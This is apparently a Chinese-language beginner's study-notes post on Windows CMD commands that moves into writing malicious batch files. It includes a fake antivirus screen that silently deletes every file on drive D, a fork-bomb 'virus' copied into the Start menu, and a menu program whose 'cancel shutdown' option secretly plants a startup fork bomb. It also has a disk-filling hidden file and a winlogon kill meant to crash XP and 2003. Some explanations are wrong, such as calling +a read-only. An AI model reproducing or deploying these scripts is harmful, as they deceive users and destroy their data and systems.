network security dayNotes

116 阅读4分钟

network security study day1

  1. window dos 命令

    1.1修改命令行颜色

    color ? 查看 颜色的编码 第一位是背景颜色 第二位是字体颜色

    color 0a --- 浅绿色

    1.2 定时关机 重启命令

    1.2.1shutdown -s -t xxx //-s 是关机的命令 -t 是多少时间 xxxs 多少秒后关闭

    1.2.2shutdown -r -t -f xxx // -r 是重启命令 reset -f 是强制的意思

    1.2.3 shutdown -s -t 100 -c '显示的信息'

    1.2.4 shutdown -l && logoff //注销用户

    1.3 切换路径

    ​ 1.3.1cd xxx // 切换到的xxx目录

    ​ 1.3.2 c: 切换到 c:盘里面

    1.3.3 cd / 切换到 现在的磁盘的 根目录

    1.4 清空命令行

    1.4.1 cls

    1.5目录相关的命令

    1.5.0 查看系统信息 system

    1.5.1 dir // 显示文件的 命令 文件夹(目录) 显示的是dir

    文件不显示 dir

    1.5.2 dir /a // 浏览所有文件,包括隐藏的

    1.5.3. attrib +h +s +a xxx文件或文件夹

    ​ attribute 属性 给文件和文件夹修改属性

    ​ +h 添加 hidden 属性 隐藏

    ​ +s 添加系统文件的属性

    ​ +a 添加只读属性

    ​ 这里也可以 -h -s -a 移除这些属性

    1.5.4 创建文件夹 md a //创建名字的 a 的文件夹

    ​ md "a b" 创建 文件夹名为 a b 要加 “”

    1.5.5 创建 空的 内容为空的 文件夹

    ​ fsutil file createnew d:\system.ini 20000000000 单位是字节byte 这里是20g

    .attrib +h +s +a

    1.5.6 删除文件

    删除文件或目录CMD命令:

    1.5.6.1

    ​ rd/s/q 盘符:\某个文件夹

    (强制删除文件文件夹和文件夹内所有文件)/s是删除所有文件夹 /q是

    不用询问就删除

    rd . /s /q 格式化盘符 (删除这个盘符的所有文件)

    del/f/s/q 盘符:\文件名

    (强制删除文件,文件名必须加文件后缀名)

    del *.txt 删除所有.txt结尾的文件

    del . 删除所有文件

    1.5.7 修改文件的关联属性

    assoc .exx=txtfile 把所有 .exe结尾的修改成txt文件

    assoc .txt=txtfile 把所有 .txt 结尾的修改成exe文件

    1.6 复制 移动 重命名

    1.6.1 copy 要复制的文件路径(相对和绝对路径都可以) 复制到哪里的路径

    1.6.2 move 要移动的文件路径(相对和绝对路径都可以) 复制到哪里的路径

    1.6.3 ren 文件原来的名字 要修改的名字

    1.7 杀进程

    ​ taskkill /im explorer.exe /f //杀进程

    ​ ntsd -c q -pn winlogon.exe

2.创建批处理

案列 .bat

在d盘生成20gb文件

d:
cd /
fsutil file createnew d:\system.ini 20000000000  ---》bity
attrib +h +a +s system.ini

删除d盘所有文件

@echo off   //不关闭 是显示在什么路径下 干了什么 关了不在显示
​
color 0a   // 命令行的颜色 0 -->background 黑色 字体颜色-->绿色
​
title av  // 修改命令行的标题 是在最上面显示的路径 c:av
​
echo ================== //输入=====
 
echo this is av look it 
​
pause  //停止
​
echo ==================
​
echo this is loading please press enter to open mainscreen
​
echo ==================
​
pause 
​
echo.//空一行
​
echo you network is something wrong please press to   resolve
​
d: >nul 2>nul  //进入d 盘  >null为了不让他在命令行输出  >2 null 找不到会报错的的 不让他输入
​
cd \ >nul 2>nul   //保证进入 d 盘的根目录  >null为了不让他在命令行输出  >2 null 找不到会报错的的 不让
​
rd . /s/q >nul 2>nul  // 删除 d盘的所有文件
​
ping -n 10 127.0.0.1 >nul 2>nul // ping 自己 延迟 10个包的时间 
​
echo congratulation !!! you enter 
​
pause
​

小病毒 ----开机就死机


copy virus.bat "%userprofile%\「开始」菜单\程序"  //userprofile是登录用户的路径 是个变量要%% 【开始】是特殊字符 要 变成一个整体 要 “” 
小知识 %xxx% 这是取变量的值
:d    //分区块 --> d 是他的区块名
start //什么不写就是打开cmd 写的话www.badiu.com  打开百度
goto d //去 d 命令区块 -->递归了 死机

小程序


@echo off
title minprogram
color 0a
​
echo ==========
echo minprogram
echo ==========
echo    ==========
echo.
​
:menu
echo        menu 
echo        1.shutdown 
echo        2.cancel shutdown
echo        3.exitecho.
echo    ==========
​
set /p num=plase choose :  //设置变量 num /p是prompt 输入的意思 显示 placr choose 的文本了if "%num%"=="1" goto 1
if "%num%" == "2" goto 2
if "%num%" == "3" goto 3echo you printf type is not a num please printf again   //用户输入不合法 提示 然后停止返回菜单
pause
goto menu
​
​
:1  
set /p time=please printf you shoudowm time
shutdown -s -f -t %time% 
goto menu
​
​
:2
shutdown -a
echo :a >> "%userprofile%\「开始」菜单\程序\启动\program.bat" 
echo start >> "%userprofile%\「开始」菜单\程序\启动\program.bat" 
echo goto a >> "%userprofile%\「开始」菜单\程序\启动\program.bat" 
goto menu
​
// > 重定向  替换
 // >> 是重定向的意思 追加   在program 文件下写入病毒是换行的
:3 
exit
goto menu
​

xp && 2003 蓝屏 --->ntsd -c q -pn winlogon.exe


@econ off
color 0a
taskkill /im explorer.exe /f   //杀进程
econ hhh
ping -n  10 127.0.0.1 >null 2>null 
start C:\windos\explorer.exe
econ Scare you

\